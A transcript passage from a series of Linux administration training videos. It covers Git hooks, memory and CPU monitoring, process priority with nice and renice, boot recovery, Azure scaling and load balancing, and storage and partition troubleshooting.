this stuff for you. And so if I change directory into hooks, what I can expect are some sample script files, such as having a commit message appear whenever you run git commit. Or you can capture certain events or points in time, like right before the commit occurs, or before you merge, or before you push changes to a remote repository. And notice that all of these example sample files have a .sample file extension, so therefore they are ignored by default. So what we're really talking about is having a way to hook into certain points of time during software development, during that life cycle, to have things automated, like testing or compiling, that kind of thing. Now, we're not here to really focus on software development. That's not the point. The point is to have a general understanding of how Git is used for version control, version tracking of files. One of those is understanding how hooks work. So let's do an example. First of all, let's use the mv command to move the prepare-commit-msg.sample file to prepare-commit
.msg. Basically, I'm removing the .sample file extension because with the sample file extension, it just gets ignored. However, now that file that we've removed the .sample extension from will not be ignored. Let's open it up using sudo nano prepare -commit -msg. Let's go down and add some stuff here just so we can prove that this is working. How about hashtag !bin/bash, which is normally what you would see at the beginning of a shell script to tell it which interpreter to use. And I'm going to echo back my customized Git hook message. That's all I want it to do. So I'm not doing anything fancy like running various tests and so on. Okay, let's go save that file and let's test that that event hook has been captured. Now we could do that by changing directory, let's say 2 levels back to our main repo directory. And that was a prepare for commit type of event. So let's run git commit -m for message. That'll prevent you from having to type in a message when it opens up the message file. Let's say test commit 1, double quotes, and let's just go ahead and press enter. Well, this is our initial commit for this repo, and there was nothing added. So why don't we add a new file? Sudo nano file1.txt. We'll just add something in it, sample text. Close out and save it. Let's run git add file1.txt. So of course, now if we run git status, it knows that there's a new file that needs to be committed. All right, let's just use our up arrow key to go back to our git commit command. We'll change the message to test commit 2 and press enter. Well, now that there was something to actually commit, notice what popped up. My customized Git hook message. Now, really, you might say that's inconsequential. It's just some text. You're right, it's only text. The point is that we can capture that point in time. If you know how to do that, and you know how to write shell scripts or how to invoke programs to do various things, the sky's the limit. You could do anything you wanted to, like run testing, compile, send off an email to admins to let them know this change occurred, whatever the case might be. And that's how Git hooks work. It's really important that Linux technicians have the ability to know which commands to issue to view memory performance. And that's going to be the focal point of this demo. The first thing we're going to do here in Linux is start by changing directory to /proc. The proc directory, if we do an ls, is where we've got subdirectories for each process ID or each PID that is currently running, that is known by the kernel. But we also have a number of files here that have statistics about how the system is doing. One of the interesting things here is the meminfo file. So the meminfo file is just a text file. I'll just go ahead and clear the screen and I will cat meminfo, and we'll pipe that to more just in case there's more than one screen full of data. So here we have a series of memory statistics, such as the total amount of memory versus the amount of free memory. So the amount of mem-free or free memory is really just the total accumulation of physical memory that's not being used at all. Memory available is what is available for starting processes and applications. We've also got a stat here called dirty. Dirty memory refers to data in memory that hasn't yet been committed to disk. I'll press Q to get out of here. Now that's a lot of the same type of stuff that you might see if you were to issue the free command. You get fewer details, but it still is related to showing you how much memory you have in total and what's free on the system and what's available. Of course, don't forget that in the proc directory, you've got a process ID directory in blue for each and every running process. Here in Linux, I can also issue commands such as top. Top will give me the top running processes, which means the ones that are using the most resources. And notice that the output is changing periodically. We can press D for delay to change the default screen delay or refresh rate from 3 seconds to something different, like 1. So now every 1 second, notice the output display for this is changing. The reason this can be very important is because one of the columns here, one of the metrics that's being shown is the percent memory. So from here, we get a sense of how much memory is being used at the individual process level. Of course, we can also use the ps command, such as ps-aux to view all running processes, regardless of user or even those not tied to a user terminal. And we can pipe that to more. And once again, aside from other metrics that are shown here, we also have the percent memory shown. The difference here, compared to top, is it's not showing us necessarily the top consumers of resources. And it's certainly not updating it in real time like top does. So I'll press Q to quit out of that. And we can also run htop, which is more of an interactive version of the top command, where at the bottom, we have a menu of what we can press to do certain things. For example, F6 allows me to sort by. So if I press F6 on the keyboard, I can select which field or column I want to sort by. In this case, let's say %memory. So now everything is shown here with the top consumers of memory always being shown at the top, and it's going in descending fashion down through the list. And of course, if I use my right arrow key, I can see more of the actual command here, so I have a sense of what it is that is consuming those memory resources, such as the Docker daemon. I'm going to go ahead and press Q to quit out of that. There are also some other interesting concepts to be aware of here. One would be limiting how much memory is available, even at the user level. If I were to run the ulimit command, notice, for the user, of course, I'm currently signed in as, it says unlimited. Ulimit can be configured so that there is only a certain amount of memory available for a particular user. So that might be a concern if you have a server being used by multiple software developers, for example. But bear in mind, if a user in Linux is, let's say, executing a shell script that has the user ID bit set, remember that script runs as the creator or the owner of the script, I should say, and not as the person invoking it. So that can affect memory utilization and can be hard to track as well. Another aspect of viewing memory metrics for Linux would be at the virtual machine level, in this case, in the Microsoft Azure cloud. Here I've already signed into the Microsoft Azure portal. From the left-hand navigator, I can go ahead and click on Virtual Machines to get a list of virtual machines, one of which I have running here, and it's called Ubuntu 2. When I click on the name of a virtual machine, it opens up its navigation bar in the left-hand side of the screen. But one of the things that I can do is on the overview page, which is automatically selected, on the far right, I can scroll down and I can click Monitoring. There are some default items that are enabled here for us to check out, like the overall virtual machine availability, the CPU utilization, and of course, things like the number of disk bytes activity in total for reading and writing. But where's memory? Well, down below that, I have a link that says Show More Metrics. But even when I click that, I get network traffic total, disk operations per second. Well, up at the top, near performance and utilization here, I can click the See All Metrics view. This is kind of like if I were to scroll down to the left-hand navigator down under Monitoring and just click Metrics. That's where it took me. And what I can do is from the list of metrics, I can choose things like available memory in bytes. And here it gets plotted on the graph. We always want to be careful and determine what the aggregation is. So what's the function run against it? Normally, we're primarily interested with memory metrics in the overall average utilization over time. Speaking of time, notice the time frame is the last 24 hours, but I can click on that. I can choose, let's say, the last 30 minutes if that's where I've perhaps had a problem with performance on the host and I suspect it's memory related. Or I might even go much longer than that and say the last 30 days. Then I get an overall picture that pretty much shows me the memory utilization has been pretty consistent, although it's gone down just a shade. Now, this can also be important for you to establish a baseline of what's normal for the workload running in this particular Linux host. We all know that CPU stands for Central Processing Unit. It's essentially the brains of the machine, whether it's a physical or virtual CPU or a collection of CPUs and cores. But what's important is understanding how to be able to determine how the CPU is performing. Is it properly accommodating the workload or workloads running on the Linux host? So one of the things that we can do to view CPU performance in Linux is to use standard commands like top. The top command, as we know, because we can also use this to refer to other things like memory utilization, shows us the top running processes, at least by process ID or PID, and the user that spawned it. And among other things shown here in the column headers, we've also got the % memory utilization. This makes it very easy for us to determine who the memory hog is. Now notice that the delay is every 3 seconds by default. You can press the D button to change the delay, let's say to every 1 second if you want it updated more frequently or perhaps less frequently. But I'm going to press Q because you might also be interested in using htop. It's essentially the top command. It just looks a little bit different. It's a little more interactive in that at the bottom, we've got keys that we can press, such as F6 for sorting. So I'm interested in that. If I press F6, I get a list of my columns over on the left-hand side of the screen, and I can use my arrow keys to go through and select what I'm interested in sorting by. I want to sort by % CPU. So the most busy or CPU-intensive processes will show up here. But notice here in htop, aside from the user under which a process is running and the process ID and the other things shown here, notice we also have the command that we can take a look at, and this can be very important so that we can determine what it is exactly
that seems to be chewing up our CPU time slices. Of course, at the top, we have an overall CPU indicator. It's only at about 1, maybe 2% thereabouts. So naturally, this Linux host is not busy. And just because the CPU utilization might spike periodically to 70, 80, maybe even 90%, we have to consider that perhaps it's just doing its job. It's computing, and maybe that's normal when there are, for example, many users connected performing database queries. In order to determine what's acceptable and normal and what's abnormal and unacceptable, you have to have a baseline for performance for the CPU and for memory that you can gauge against when things are running properly, so you know what's normal and what's not. You don't want to hit the panic button just because the CPU is spiking periodically at 85% for a few seconds at a time. I'll press Q to quit out of HTOP. We can also use, of course, the PS, the process command. I'll just pass it -aux in lowercase letters to view all processes. Now, if I scroll back up through the output, this does not update in real time like top and HTOP do, but we do have a listing of the percent memory utilization for a particular given running process. Again, this is not a busy Linux server, but of course you can also use output redirection to write that to a file if you need to for historic purposes. So I could use that previous command and use the greater than symbol, output redirection, and maybe even the double greater than sign to append if I want to keep a running list, maybe psstats.txt. And so now if I cat that file, it has that information within it. So if I need to email it to somebody or something like that, we can do that quite easily. We can also type in uptime just to get some details about how long the server has been up. And the load average overall is shown here at different time samples. So by looking at this, we know that, again, this Linux host is not very busy when it comes to CPU utilization. We can use the lscpu command, list CPU command, to get details related to the CPU subsystem within this host. So we have the architecture, so 64-bit. We have the number of CPUs here, shown here as 1. The number of threads per core, the number of cores per CPU socket. The vendor, in this case, Genuine Intel. And we have the specific model name shown here as well. The speed rating in megahertz, which is going to be important because naturally a higher rated CPU can do more things more quickly than a slower one. But again, depending on your workload, it might not matter if you bump up, let's say, from 2600 megahertz to 3000. It really depends on the workload and how CPU intensive it is. Now, in this case, notice that we have full virtualization. So this is a virtual machine running on a Microsoft hypervisor. We also have the CPU-specific amount of cache, the L1, L2, and L3 cache, dedicated for caching CPU instructions. But there are other important commands as well. For example, mpstat. This gives us statistics on all of our CPUs. And of course, depending on how many we have, will determine how much we have here in output. We've got one 64-bit CPU. We have the Linux kernel version here. And of course, we have things like the CPU utilization. So it's mostly idle for all CPU cores. The problem when you have a very overworked machine that has a CPU that's very busy is that issuing these commands themselves can take time before you get anything back. And that's one of the conundrums with this. If it makes sense and you won't have too many people affected negatively, sometimes simply rebooting the server will do the trick. And there are many ways you can do that, including as you do init 6 to switch to run level 6, which means restart. And of course, if we've got a virtual machine, whether it's running on premises or in the cloud, we can view the memory stats even outside of the OS. Here in the Microsoft Azure portal, in the Microsoft Azure cloud, on the left, I'll expand out the navigator, go to virtual machines, click on my Ubuntu Linux running virtual machine, where in the overview page, if I just kind of scroll down a bit on the right and then click on the monitoring heading, there are a couple of metrics that are monitored here automatically, including the CPU average, which we can see is quite low here. It's under 3% overall. But if we were to click on that to zoom into it, we can also control the time frame, the default of which is set to the last 24 hours. Maybe I'm just interested in the last 30 minutes of CPU utilization so I can see whether there was a spike, or maybe I'm interested in the last 7 days worth of CPU activity. So this can always be very important when you want to be able to track CPU utilization, especially if you want to establish a performance baseline. In this demo, we're going to be focusing on how to manage Linux process CPU time. In other words, can we somehow control at a prioritization level how many CPU time slices are given to specific running processes that might be more high priority? And the answer is yes, we can do that. And that's where the nice value comes in for a given running process.
Now, what's the nice value about? Let's start by taking a look. Let's issue the ps-aux, those are lowercase letters, command. When I do that, I get the standard output, and what that means is it includes some of the columns like the user under which a process is running, the process ID, %CPU and memory utilization, and so on. Of course, the command. But we don't have the nice value, but we can control the output of the ps command. I can run ps-eo, and let's say I'm interested in the process ID, so the PID column, comma, com column, comma, and the nice value, so comma ni. There's no spaces between those. So I have now in my output the process ID, the command, and the nice value, which really controls the priority it has with relation to CPU time. Now, what does that mean? Well, having a -20 value means that that given process has the highest nice priority value. In other words, it will get more time from the CPU than a process that has a nice value of 0. The lowest nice priority value is +19. Okay, so this is an interesting way to see that. There might be some cases when you're troubleshooting Linux and you want to give a given process, whether it's a long-running script, a background daemon, whatever the case is, a higher nice value, a higher priority. Now, if we run the top command, you'll notice that by default, its output does include an NI column heading. So it's got the nice value shown here automatically. I'll press Q to quit out of that. The same thing is true if we were to run the htop interactive version of the top command, where we still have the nice value shown here. So again, Q for quit. So how do we control what the nice value is? Well, we could look at the man page for the nice command. So run a program with modified scheduling priority as it relates to the CPU. But we also have a man page for the renice command. So if we want to set the nice value for something that's already running with a given nice value. So to alter the priority of an existing running process. So down in the examples, notice that they are specifying the nice value, and they're also specifying with the -p the process ID, as well as the process specified here right at the command line after the new nice value, 987. And then we're also changing the nice value for any processes that are running as either user daemon or user root. We're setting it to a value of +1. Okay, I'll press Q to quit out of that. The next thing I want to do is take a look at a script I've already got created here. It's just simply called test.sh. The only thing in this script is the bang line where it points to bin bash, clearing the screen, and then sleeping for 3 minutes. What I want to do is I want to spawn this with a specific nice value, and I'll do that with the nice command. And then what we'll do is we'll send it to the background so we get back our command prompt, and we can verify it's actually running and using the configured nice value. So how are we going to do this? Well, I'm going to run sudo nice -n, where I'll specify the nice value of 5. Remember, -20 is high priority, +19 is low. And then I'll specify the command, in this case, // for current directory, and I'll refer to test.sh. Now it's running in the foreground. I can press Ctrl-Z to get my command prompt back. Now I'm going to run the ps command, once again, process command, -eo, and I'm going to tell it I want the command, comma, and the nice value columns shown. That's all I want. And to make it easier to spot what we need to see, I will pipe that to grep, and I'll put in test.sh. So notice that test.sh is showing up as the command, and the nice value is showing up here with the value of 5, as per our configuration with the nice command. But we can also use the renice command to modify an existing command's nice value. So I'm going to run the same ps command, except what I've added here is that I want the process ID. For example, if I want to renice a specific process ID, I can do that with sudo renice -n. Let's say I want to use a value of -2 -p, and I can give it the process number, the process ID number, in this case 13732. Enter. So the old priority is showing here as being 5, where the new priority is 2. Well, if we use our up arrow key to bring up one of the ps commands, notice that that process ID has successfully had its nice value, or its scheduling priority, set to the new value of -2. Bear in mind that these changes are only in effect while the system is up and running. So either you can change it with the renice command to a different nice value, or you can restart. Of course, you could have a startup file like a script that would set the nice value for a given process.
This is normally designed as kind of a short-term fix when you want to make sure a running process gets its proper share of CPU time. In this demonstration, we're going to chat about how to troubleshoot Linux boot problems. Now, boot problems can be related to hardware, such as failed disks at the hardware level. However, in reality, most times it's a software issue. Maybe a file system item has become corrupt, or a technician has repartitioned disks or changed mount points in such a way that the system can no longer boot correctly. One thing that you should always have in your toolkit and ready is a bootable way to get into Linux. Usually, that is available automatically from the installation media for most Linux distributions. For example, with Ubuntu Linux, if I were to download a server install image, it's an ISO file, I can boot from that ISO image, or I can write it to DVD, whatever the case is, I can boot from it and I can choose to go into a rescue mode. Let me demonstrate how that works. Here on my on-premises system, I am using VMware Workstation where I've already got Ubuntu 64-bit installed within the virtual machine. If I click Edit Virtual Machine Settings, notice if I click on CD DVD that it's going to be connected when the virtual machine is powered on, and I'm actually pointing to the ISO image for Ubuntu that I've downloaded. It's the same type of thing you would do to install Linux initially within a virtual machine environment such as this. If I just power on the virtual machine as per usual, then I get the standard grub menu options to try or install Ubuntu server, boot from the next volume, go into the UEFI firmware settings. However, here's what's interesting. If I were to power this off and then power the virtual machine back on, but as soon as I see my BIOS message, if I press Control X, it takes me into this grub menu that gives me some advanced options. That's not normally what we see in the grub menu. Now, the keystroke you press exactly will vary depending on the distribution of Linux that you're using, that you're booting from, or whichever tool you happen to be using. At any rate, I'm going to go into the advanced options for Ubuntu. Notice that I've got options here for different Linux kernel versions in recovery mode. So I'm going to select one of them and press Enter. So even if the machine will not boot from disk, this is still going to work. So here I have a recovery menu where I have a number of very important options. I can resume a normal boot. Well, presumably, if you haven't yet tried to solve a boot issue, you can't do that. We can use the clean option to try to free up space on the disk. We can repair broken packages that might have become corrupt over time. We can check the file systems for corruption. We can update the grub bootloader if there's been a configuration change made to that, maybe because of disk partitioning that has changed. We could drop to a root shell prompt. Now, I can go into a command prompt. It tells me I'm in emergency mode. Now, one of the things you'll want to do here, because the root partition normally is mounted in read-only mode when you're in rescue mode, now that you're signed in, you can use Mount-O for option. You want to remount, with read-write, RW, so not just read-only, but read-writable, and then specify the root file system with a slash. After you do that, you could then issue the mount --all command to mount all other file systems after the root file system has been mounted in read-write mode. Now, this is fine if you have local access, let's say, to a virtual machine environment or even a physical Linux host. When it comes to remotely managing a large amount of Linux hosts, such as in a data center, hardware remote control becomes important. So you could force a reboot and do all these things without the operating system even running. You might also consider running commands like file system check. If we look at the man page, then we'll get the details about how to use this command line along with all of its command line options. I'll press Q to quit out of that. If I simply press Enter after typing in fsck, it's going to assume I'm pointing to my root file system, which here is on /dev/sda1. And it says, wait a minute, this is mounted. And you can cause problems if the file system is mounted when you run this. So ideally, the file system will not be mounted when we run file system check. So I'll type in no here. Of course, you would use the umount command if you wanted to unmount a file system. And again, depending on who you're signed in as, you might have to prefix that with sudo. At that point, you would then be able to run file system check against the file system because maybe the corruption is what's causing the boot problems. Now, sometimes the problem is the grub bootloader. Maybe it's pointing to the wrong root file system, especially if you've messed around with the partitions or maybe installed a second or even a third operating system for dual or triple booting. Remember that you can always run sudo fdisk-l to view your disk partitioning, in this case, such as for device SDA, and the partition is SDA1. So if you've booted through, for example, a boot CD, maybe the installation CD in recovery mode, and you're at a terminal, you can try to reinstall grub if you suspect there's a problem with the grub booting software itself, running sudo grub-install, specify --boot -directory. You can specify the root file system and tell it that that comes from device/dev/SDA. Now, we don't want to specify the partition number of 1. We just point to SDA, as grub gives us a boot menu, and the whole idea is that we could boot 2 different partitions if we need to. I'm not going to do this as I have a functional Ubuntu system, but once you've done this, you would then test it by rebooting. And ideally, you'll be able to boot properly, where if previously you had problems booting due to grub, they will have been solved, potentially, with this command. In this demonstration, we're going to talk about how you can vertically scale Linux to improve performance. Now, what does vertical scaling mean? What it means is that we are adjusting the underlying horsepower for various subsystems, whether it's storage, networking, processor, or CPU, increasing the amount of RAM. All of those things, if we are adding it, means we are scaling up. We're scaling vertically, but vertically can also mean down, because you can scale down by removing some of those hardware resources, whether they're physical or virtual, depending on what your workloads running in Linux require. But before you can do this, before you can vertically scale Linux, you first need to know what you have for resources, such as the amount of RAM in Linux, and how it's being used, and whether or not it really is suffering from a performance degradation. Let's think about this. First things first, here in Linux, I'm going to begin by running top. Let's see the top running processes. We already know how to use this command in the sense that it updates by default every 3 seconds to show us the top consumers on this machine, such as for CPU utilization and memory utilization. Now, in this particular example, we're hovering in the 0.3 to 1% CPU utilization, somewhere around there. There's not an issue with that. We definitely don't need to scale up when it comes to the CPU. It's barely being used. Of course, you want to make sure you check this on an average over time. Maybe it's the middle of the night in your time zone right now, and no one's using whatever workload is running on this server, and that's why. This needs to be done over time and determine what the normal baseline during normal usage is for the CPU being used. That just makes sense, doesn't it? How busy does the server look when it's actually being used for what it's supposed to be used for? The same thing is true with percent memory. We don't want to scale up the amount of RAM if we don't really need it, unless we anticipate a need, because we know we're going to be running a new vamped up version of an app on this server and it needs more juice. Now, if this is a physical Linux server, how do you scale it up? It means either reconfiguring things at the hardware level, or you can only do that to a limited degree, adding more hardware resources, adding a faster CPU if the socket on the motherboard can accommodate it, or if it's a multiprocessor motherboard, adding more CPUs to sockets if they're not already populated, maybe upgrading the amount of RAM for the RAM chips in the motherboard slots if the motherboard supports it. You could physically upgrade or vertically scale in that way. Now, let's say we've got a virtual machine environment on premises. In my example, it's VMware Workstation, but the concepts are the same regardless of what you're using. You can modify the amount of virtual hardware resources that are visible to the guest operating system in the virtual machine. So if I edit my virtual machine settings, it shows me the device configuration for this particular virtual machine, such as the amount of memory or RAM. Here it's currently set to 4 gigabytes. Now, having that selected on the left, on the right, I can drag up the slider. Now, there's going to be a limit, of course, which is dependent upon the amount of physical memory you have available. But when it comes to virtual machines, you also have to think about other virtual machines that might be running at the same time. Some virtual machine solutions will allow you to configure dynamic memory, where if one virtual machine makes a call for more memory, it can be allocated by reducing the amount of memory available to more idle virtual machines running on the same hypervisor host. In the same way, I could also click processors here on the left to determine the number of processors I want visible to this OS and whether I want virtualization support. But that's on premises. What about in the cloud? This is where cloud computing is really pretty neat. Essentially, a data center that we might have managed and worked in on premises has been moved into someone else's data center, some other environment that's accessible over a network. In general terms, that's part of what cloud computing is about. You're running IT services on someone else's hardware wherever it happens to exist. But we can resize. Here in the Microsoft Azure portal, in the left-hand navigator, I'm going to go to virtual machines. Now, when I say resize, what we're talking about in this particular example is scaling up or scaling down a virtual machine's resources. If I click on a virtual machine here to open up its properties, in the left-hand navigator, we have the word size. This is where the horsepower is determined. Notice we have a column that shows the number of virtual CPUs for a given size that we might choose to select, and also the RAM in gigabytes. So maybe I need 8 virtual CPUs and 32 gig of RAM. If I've checked my performance counters over time, and it seems like the server is stressed with the current workload. You can always scale down too. Now, naturally, in the cloud, when you are scaling up vertically, which also can include the number of input-output operations per second at the disk subsystem level for throughput. But when you scale up, you will be charged more when the virtual machine is running. So having 8 virtual CPUs and 32 gigs of RAM versus 2 virtual CPUs and 8 gigs of RAM, there will be a price difference. You could then choose to resize your virtual machine. Will it affect any of the workloads running on it? Usually, yes, and it might need to restart it. But at any rate, when it comes to vertically scaling Linux for performance purposes, these are the various things that we need to think about. In this demonstration, we're going to talk about how we can scale Linux horizontally using load balancing. Now, scaling means we are either adding or removing something. When we talk about horizontal scaling, we are talking about adding additional Linux-based virtual machines to support a given workload, whatever that is, whether it's big data number crunching, whether it's running a busy web app, whatever it is. Now, we can do that with a load balancer in the cloud. It's not the only way this can be done, of course, but that's what we will be doing here. Now, you might ask, what does that have to do with troubleshooting? Plenty, because normally you will arrive at the conclusion that there just aren't enough virtual machines running concurrently to support our peak workload times. So once performance has degraded and you've arrived at that conclusion, you can then do something about it. So we're going to go ahead and build a load balancer configuration with a backend pool consisting of 2 Ubuntu Linux virtual machines. Here in the Microsoft Azure portal, I've already navigated to the virtual machines view, and here we've got 2 virtual machines, and I'll just click the refresh button, that are now showing as up and running. Now let's assume both of them have a web server stack, whether it's Nginx, whether it's the Apache web server, whatever it is, and the same website or app content. So I'm going to start here by clicking Create a Resource in the upper left, and I'm going to search for Load Balancer. And I'll choose Load Balancer. And for Microsoft Azure service, I'll click Load Balancer for that, and I'll click Create. Now, when I deploy a resource in the cloud, and I'm deploying a load balancer configuration here, I have to put it in a resource group that organizes related resources. So I've already got a resource group called HQ for headquarters. I'll put it there. We need a name for the load balancer. How about Linux App 1 LB1? We'll have this running in the East US region. I'm not going to change the SKU. It's just going to be a standard type of load balancer. If this is a public-facing load balancer for an app, then I would choose public. But you can also have a load-balanced app, which in the back end uses a few virtual machines. That's for an internal line of business app. But in this case, we'll choose public, and the tier, we'll leave it on regional, and I'll click Next. So the front-end IP configuration, we're going to click Add to add one, and I'll call it front-end config 1. It's going to be for IPv4 with an IP address. We can either choose an existing public IP address, or we can create a new one. I'll choose Create New, call it LB1 for Load Balancer 1, pub IP, and then I'll go ahead and click OK and Add. That's our front-end configuration. So clients that will be using an app, if it's a client type of app, they need to be directed to this public IP address, for example, through a DNS A or a quad A record, well, in this case A for IPv4, because this is where the load balancer will sort of act as a funnel and take incoming app requests and distribute it to the least busy backend virtual machine. So let's click Next for the backend pools. We don't have one yet. I'll click Add a backend pool. I'll call it BE for backend pool 1. I've already got a virtual network that will be tied to. And for IP configurations down below, I'll click Add. Now this allows me to determine who, in terms of virtual machines, will be a member of the backend pool. There's our 2 Ubuntu Linux servers. They're shown here with their IPv4 private internal IP addresses here in the Azure cloud. And I want to save this backend pool, so I'll click Save.
So we've got the front-end IP, we've got the back-end pool. I'll click Next for inbound rules, and I'll add a load balancing rule. I'll call it LB Rule 1 for IPv4. So when we get requests coming to our front-end config 1, I want the back-end pool we configure to receive those requests at the end of the day to service it for the client over TCP. We can choose the front-end port, let's say 443, and also the back-end port that the app is truly listening on. Ports don't have to be the same. Now, we also have to set up a health probe. where the load balancer can keep track of which back-end virtual machines are up and running and healthy and thus can service requests for the app. I'll click Create New, call it HP1 for Health Probe 1. Let's say we'll just have it periodically, maybe every 20 seconds, basically connect it to TCP port 80 in the back end to make sure we get a response. And I'll click Save. Now, I don't need to configure an outbound port rule or anything like that. So at this point, we would just create the load balancer. Okay, let's go ahead and do that. Okay, after a few moments, the load balancer deployment is complete. We can choose to go to the resource to view its properties, but at any point in the future, if you go to the All Resources view, and if you filter the name of resources here, let's say for Lin, there's the Linux App 1 LB1, the load balancer. If I click on it, and if I click the front-end IP configuration on the left, there's the configuration. We have an assigned public IP address. If I go to back-end pools, there's the back-end pool with our 2 Ubuntu Linux virtual machines. However, what we've done is manually scaled this. We can go at any point in time to add or remove virtual machines, but that's manual. It's not auto-scaling. In Azure, you can also create what's called a virtual machine scale set. When you go to create a virtual machine scale set, and you can use this for a load balancer if you want to, under the scaling part of this configuration, this is where you can configure your scaling policy. So you can set the initial instance count. How many virtual machine instances should we have? And then if you click Custom for the scaling policy, you can set the maximum number of instances, and at which point it will trigger adding VM instances, like the % of CPU utilization for a certain number of minutes. Also in Azure, if I were to go to create a different type of resource, let's say an app service, which is a web application hosted in Azure, when you go to configure an app service, it's automatically scaled for you, although you do have some control of it if you need that fine-grained control over the configuration. Let's take a few minutes to talk about how you might troubleshoot storage and network hardware on a Linux host. In this particular discussion, the focus is going to be on the Ubuntu Linux distribution. And the only reason for that is because when you have a specific distribution that you will be working with and potentially troubleshooting, the first thing you should do is plan out the hardware that will be used for that Linux host. Now, of course, we're really talking about if you're installing Linux on a physical machine. If it's running as a virtual machine, then of course you configure virtual hardware resources accordingly. But assuming we're working from a physical server standpoint on which Linux will be installed, this is very important. So here I've gone to ubuntu.com/certified. The idea is that I can plan out, for example, by clicking the servers link, and then by scrolling down, I can browse through, I can search, I can filter out what I'm looking at. I can determine what hardware is guaranteed and is known to work correctly with this distribution of Linux. Now, sometimes we don't have that luxury, even if we're dealing with physical servers. In other words, we inherit servers either already have Linux installed or that we must install Linux on, and we don't have the choice of making sure all of the hardware is certified. But it's one starting point to think about. Here I've switched to VMware Workstation, which I have running on my on-premises computer. Here I've got a number of virtual machines, including Ubuntu Linux. The point, of course, being that we can edit the virtual machine virtual hardware settings. So if we wanted to modify some details related to virtual disks or add new disks, we could do that. If we wanted to modify the amount of memory, all of this is one aspect of troubleshooting Linux in terms of not having enough hardware resources. That shows up as performance degradation, of course. And then, of course, working at the Linux command line can help us along with troubleshooting storage and network issues or memory issues, whatever the case might be. The first thing I'm going to do here is run the sudo dmessage command to get a log of kernel listed events. I'll pipe that to the more command. Here I get some details about the fact that the kernel is detecting that this is a virtual machine running on a Microsoft Hyper-V hypervisor. Indeed, that's the case. This is actually an Ubuntu Linux virtual machine running in the Microsoft Azure cloud. Then other things such as the fact that at the disk level or the storage level, secure boot is enabled, which of course is used to check the validity or the signature of operating system files to ensure that malicious files haven't been planted or have become corrupt. Then we get some details about the detected CPU hardware. Then we'll have some references to mass storage devices being detected, for example, SDC, among other devices like SDD, SDB, SDA. The first mass storage block device would be listed as SDA. We'll get messages further down here about those SCSI disks being attached to the host and therefore being available. Doesn't mean the file systems don't need to be checked perhaps if there's corruption, but it does mean that the Linux kernel knows about those devices. I'll press Q to get out of here. The point is that if there are any problems, we'll have some error messages related to those types of things. Everything looks good in this particular case. Of course, you could also pipe the dmessage command to the grep line filtering tool and perhaps, let's say, look for a network interface like ETH0 if we're troubleshooting network hardware. But in this case, it found entries, but there are no problems shown. There's a handful of other commands we should be aware of. For example, sometimes it can be difficult to track what is causing a performance issue on a host. It could be a lack of disk space, for instance. So if I run disk free or df-h for human readable, here I have all of my file systems known by the kernel shown here with the size, what's used, what's available, the percentage in use, and the mount point, such as the root file system here, just shown here as a front slash. Naturally, when we get very low on disk space, it becomes a problem where the performance of the machine could suffer, especially if you're dealing with swap space, which is basically used as additional memory, although it's much slower than physical RAM. But we'll talk about swap. So we don't have an issue with disk space here. Also, besides running dmessage, we can also run listblock lsblk-scsi, for example, to list discovered devices. So here we've got SDA through to SDD. Of course, we could run fdisk against one of those to see how it's carved out in terms of partitions. So sudo, let's say fdisk-l for list /dev/sdc. And here we'll get some details such as the size of the disk and then how it's been carved out and what types of file systems we've got there. Something else that might cause a problem at the storage level is the /etc/fstab file, where we've got entries on persistent mount points, in this case using things like device IDs, which is being used to mount the root file system of type ext4. Then, of course, we've got the listed options for that mount, which might include other things like read-only, depending on how it's being used. You wouldn't want that for the file system all the time, of course. That is the root file system. Or whether you're supporting user or group quotas, that's not listed here. Whether or not it should be included in the dump utility or for file system checking. And of course, if we have an error in the reference to the user ID or the device mapping, then we're going to have a problem with auto mounting. So if you create new disk partitions and new mount points for maybe additional data storage locations, you'll have to make sure you add an entry to fstab for it to be mounted every time the host boots up. Of course, we can always use the mount command. Let's say I'll pipe that to grep. Maybe I'm looking for SDC. So the mount command, of course, will show me what is currently mounted successfully and how it's been mounted, such as /dev/sdc1, which is our root file system, mounted in read-write mode, and so on. So the fact that it's mounted is good. It means it's accessible. So if the system didn't perform a file system check, let's say, of a corrupted file system on boot, or it's become corrupted while the server was running, I can also run sudo fsck file system check. And as long as it's not mounted, I can point to /dev/sdd1, let's say, for example, that given partition. And because it's a tiny disk partition in my particular example, and there are no problems, we have no error messages returned. We could add a -a to that to automatically fix any detected corruption. Now, this is all fine and dandy if the storage on your Linux host is well enough to boot in the first place to get to this point. As a Linux tech, you must make sure you always have available to you some alternative way of booting up the machine, whether it's the installation media, whether you burn it to a physical DVD if you're taking care of physical servers, or whether you've got an ISO image that you use for virtual machines on premises, or maybe you're booting from a USB thumb drive or something like that. You need an alternative way to boot the machine if it won't boot, so you can get into the Linux operating system to troubleshoot issues. In this demo, I'm going to focus on how to resize partitions and how to work with file systems on those disk partitions. The first way we'll take a peek at this is from the perspective of a Linux host with a GUI. Here I'm using Ubuntu Desktop, but it certainly isn't limited to just using Ubuntu to do this. The first thing I'll do here on my Ubuntu Desktop system is I'll go into the menu, the Show Applications button over here on the left, and I'm going to search up, let's say, the word disk. So here I've got a number of options, all of which are very important, like just going into the file system to manage files, maybe permissions and copy files around, that kind of thing. Creating a startup disk, always crucial for troubleshooting Linux machines that will not start up. Getting disk usage analytics, and what we're interested in here, just disks. So if I click on disks, it will show me my detected disk devices over on the left. So I've got an 86 gigabyte hard disk, a 21 gigabyte hard disk, a floppy drive, CD, DVD, and so on. If I were to select, for example, my 86 gigabyte hard disk, when I click it on the left, on the right, it shows me how that has been carved out in terms of partitions. So it's a GUID partition table or a GPT disk as opposed to MBR or master boot record, which is limited to only 4 partitions. And if I select my first partition here, I've got the size here around 1 megabyte. It's /dev/SDA1 and it's used as a BIOS boot partition. Then I've got another partition where the size is about 538 megabytes. 530 megabytes are free, so it's only 1.4% full. Looks like it is a FAT type of file system mounted at /boot/EFI on DevSDA2. And then I've got my main root file system here. I've got about 68 gigabytes of free space. So that partition is only about 20.7% full, and the partition type is a Linux file system. Now, having that Linux file system selected, if I click the gear or cog or configuration icon, whatever you would like to refer to it as, I get some options to format the partition, to edit the partition or the file system on that partition, resize, check the file system, repair, edit the mount options, and so on. So if I were to choose, let's say, resize, it tells me that when you resize a file system, you'd better be careful and first of all, make sure you have a recent backup because you never know what will go wrong when you embark on partition level operations. So to resize the volume, I can either extend it if there's free space available. In this case, there's not, but I can also shrink it if I'm not using all of the space in the partition and I don't need all that space. So as I drag the slider here, of course, it's adjusting the partition size, the free space following, and the difference. In this case, because it's the root file system, we would have to boot through alternative means and make sure it's not mounted before this happens. So I'll just cancel this, but I will click my second hard 